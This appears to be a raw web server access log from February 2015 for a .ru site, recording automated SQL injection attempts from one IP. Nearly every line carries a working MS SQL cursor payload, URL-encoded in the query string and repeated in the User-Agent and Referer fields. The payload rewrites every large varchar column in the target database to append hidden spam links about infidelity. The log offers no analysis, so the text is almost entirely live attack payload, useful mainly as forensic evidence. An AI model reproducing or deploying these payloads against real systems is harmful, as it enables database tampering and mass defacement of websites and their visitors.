Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3227 0
2015-02-23 17:25:56 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2038 0
2015-02-23 17:25:57 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''online%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.businessdating.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''How-women-cheat%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''wives%20that%20cheat''%20when%201%20then%20''redirect''%20else%20''most%20women%20cheat''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20women%20want%20men''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3230 0
2015-02-23 17:25:57 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com');declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">online+<a+href="http://blog.businessdating.com/page/How-women-cheat">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''wives+that+cheat''+when+1+then+''redirect''+else+''most+women+cheat''+end++''</a>+women+want+men</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2040 0
2015-02-23 17:26:06 GET /info.aspx infoid=20';declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3495 421
2015-02-23 17:26:07 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com';declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2198 328
2015-02-23 17:26:16 GET /info.aspx infoid=20;declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com;declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 32324 3492 8656
2015-02-23 17:26:17 GET /scripts/wholesale-purses-0174.asp - 188.165.15.188 HTTP/1.0 Mozilla/5.0+(compatible;+AhrefsBot/5.0;++http://ahrefs.com/robot/) - www.site.ru 404 1906 309 0
2015-02-23 17:26:19 GET /info.aspx infoid=20);declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 302 458 3495 0
2015-02-23 17:26:19 GET /error.aspx aspxerrorpath=/info.aspx 202.6.132.70 HTTP/1.0 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:24.0)+Gecko/20100101+Firefox/24.0);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- http://google.com);declare+@c+cursor;declare+@d+varchar(4000);set+@c=cursor+for+select+'update+['+TABLE_NAME+']+set+['+COLUMN_NAME+']=['+COLUMN_NAME+']+case+ABS(CHECKSUM(NewId()))%7+when+0+then+''<div+style="display:none">when+your+husband+cheats+<a+href="http://blog.gobiztech.com/page/men-having-affairs.aspx">''+case+ABS(CHECKSUM(NewId()))%3+when+0+then+''what+makes+married+men+cheat''+when+1+then+''what+makes+a+husband+cheat''+else+''my+husband+almost+cheated+on+me''+end++''</a>+why+do+husbands+have+affairs</div>''+else+''''+end'+FROM+sysindexes+AS+i+INNER+JOIN+sysobjects+AS+o+ON+i.id=o.id+INNER+JOIN+INFORMATION_SCHEMA.COLUMNS+ON+o.NAME=TABLE_NAME+WHERE(indid=0+or+indid=1)+and+DATA_TYPE+like+'%varchar'+and(CHARACTER_MAXIMUM_LENGTH=-1+or+CHARACTER_MAXIMUM_LENGTH=2147483647);open+@c;fetch+next+from+@c+into+@d;while+@@FETCH_STATUS=0+begin+exec+(@d);fetch+next+from+@c+into+@d;end;close+@c-- www.site.ru 200 7108 2198 15
2015-02-23 17:26:20 GET /info.aspx infoid=20');declare%20@c%20cursor;declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20'update%20%5B'%2BTABLE_NAME%2B'%5D%20set%20%5B'%2BCOLUMN_NAME%2B'%5D=%5B'%2BCOLUMN_NAME%2B'%5D%2Bcase%20ABS(CHECKSUM(NewId()))%257%20when%200%20then%20''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''when%20your%20husband%20cheats%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''blog.gobiztech.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''men-having-affairs.aspx%22''%2Bchar(62)%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''what%20makes%20married%20men%20cheat''%20when%201%20then%20''what%20makes%20a%20husband%20cheat''%20else%20''my%20husband%20almost%20cheated%20on%20me''%20end%20%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20why%20do%20husbands%20have%20affairs''%2Bchar(60)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''%20else%20''''%20end'%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid=0%20or%20indid=1)%20and%20DATA_TYPE%20like%20'%25varchar'%20and(CHARACTER_MAXIMUM_LENGTH=-1%20or%20CHARACTER_MAXIMUM_LENGTH=2147483647);open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c-- 202.6.132.70 HTTP/1.0 
